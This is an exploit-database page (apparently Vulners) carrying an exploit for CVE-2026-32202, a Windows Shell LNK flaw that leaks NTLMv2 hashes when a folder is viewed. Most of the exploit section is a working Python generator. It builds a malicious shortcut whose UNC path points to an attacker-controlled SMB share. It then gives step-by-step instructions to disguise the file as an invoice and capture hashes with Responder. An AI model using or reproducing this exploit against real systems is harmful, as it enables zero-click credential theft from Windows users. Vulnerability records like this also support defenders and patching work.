Vulners
Lucene search
📄 Windows Shell LNK Spoofing / NTLMv2 Hash Capture
| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
 | A Shortcut to Coercion: Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202 | 23 Apr 202606:00 | – | akamaiblog |
 | CVE-2026-32202 | 14 Apr 202616:57 | – | attackerkb |
 | CVE-2026-32202 | 14 Apr 202616:57 | – | alpinelinux |
 | Exploit for Protection Mechanism Failure in Microsoft | 30 Apr 202617:34 | – | githubexploit |
 | CVE-2025-32202 | 10 Apr 202509:49 | – | circl |
| CVE-2026-32202 | 14 Apr 202615:49 | – | circl |
 | Microsoft Windows Protection Mechanism Failure Vulnerability | 28 Apr 202600:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 28 Apr 202612:00 | – | cisa |
 | WordPress plugin Insert or Embed Articulate Content into WordPress 代码问题漏洞 | 10 Apr 202500:00 | – | cnnvd |
| Microsoft Windows Shell 安全漏洞 | 14 Apr 202600:00 | – | cnnvd |
10
# Titles: CVE-2026-32202 - Windows Shell LNK Spoofing to NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.
**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)
**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025
**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
```POST
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:
```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""
import struct
import sys
import os
def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
share_name="share"):
"""
Creates LNK file with UNC path to attacker machine
"""
unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'
# LNK structure (standard + vulnerable component)
lnk = bytearray()
# ===== HEADER (76 bytes) =====
lnk.extend(struct.pack('<I', 0x0000004C)) # HeaderSize
# LinkCLSID: {00021401-0000-0000-C000-000000000046}
lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
lnk.extend(struct.pack('<I', 0x000002A3)) # LinkFlags
(HasName|HasWorkingDir|HasArguments|IsUnicode)
lnk.extend(struct.pack('<I', 0x00000080)) # FileAttributes (NORMAL)
lnk.extend(struct.pack('<Q', 0)) # CreationTime
lnk.extend(struct.pack('<Q', 0)) # AccessTime
lnk.extend(struct.pack('<Q', 0)) # WriteTime
lnk.extend(struct.pack('<I', 0x00001000)) # FileSize
lnk.extend(struct.pack('<I', 0x00000000)) # IconIndex
lnk.extend(struct.pack('<I', 0x00000001)) # ShowCommand (SW_NORMAL)
lnk.extend(struct.pack('<H', 0x0000)) # Hotkey
lnk.extend(b'\x00\x00') # Reserved
lnk.extend(b'\x00\x00\x00\x00') # Reserved2
lnk.extend(b'\x00\x00\x00\x00') # Reserved3
# ===== IDLIST (activates when folder is opened) =====
# Shell Folder IDITEM
lnk.extend(b'\x14\x00') # ItemID size (20 bytes)
lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
lnk.extend(b'\x00\x00') # Terminating ID
# ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
# NameString (UNC path - triggers NTLM hash leak)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ArgumentsString (empty)
lnk.extend(b'\x00\x00')
# WorkingDir (UNC path again)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ===== Console Properties (required for some Windows versions) =====
lnk.extend(b'\x50\x00\x14\x00') # dwWindowSize (80x20)
lnk.extend(b'\x50\x00\xfa\x00') # dwBufferSize (80x250)
lnk.extend(b'\x00\x00\x00\x00') # dwFontSize
lnk.extend(b'\x00\x00\x00\x00') # dwFontFamily
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameLen
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameOffset
lnk.extend(b'\x00\x00\x00\x00') # dwStyle
# 64 bytes padding
lnk.extend(b'\x00' * 64)
# Save the file
with open(output_file, 'wb') as f:
f.write(lnk)
return output_file, unc_path
def main():
print(r"""
╔═══════════════════════════════════════════╗
║ CVE-2026-32202 - LNK Generator ║
║ Author: nu11secur1ty ║
╚═══════════════════════════════════════════╝
""")
if len(sys.argv) < 2:
print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP>
[output_file]")
print("Example: python3 cve_2026_32202_gen.py 192.168.1.100
invoice.lnk")
sys.exit(1)
attacker_ip = sys.argv[1]
output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"
lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)
print(f"[+] Exploit ready!")
print(f"[+] File: {lnk_file}")
print(f"[+] UNC path: {unc_path}")
print()
print("[*] Next steps:")
print(f" 1. Start Responder: sudo responder -I eth0 -v")
print(f" 2. Transfer {lnk_file} to Windows 11 Desktop")
print(f" 3. Open Desktop in File Explorer (no click required)")
print(f" 4. Watch Responder - NTLM hash will appear")
print()
with open("start_responder.sh", "w") as f:
f.write("#!/bin/bash\n")
f.write("echo \"[+] Starting Responder...\"\n")
f.write("sudo responder -I eth0 -v\n")
os.chmod("start_responder.sh", 0o755)
print("[+] Helper script created: start_responder.sh")
if __name__ == "__main__":
main()
```
Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)
Code:
[code](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)
Time spent:
02:30:00
--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2026 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.1
EPSS0.19985
SSVC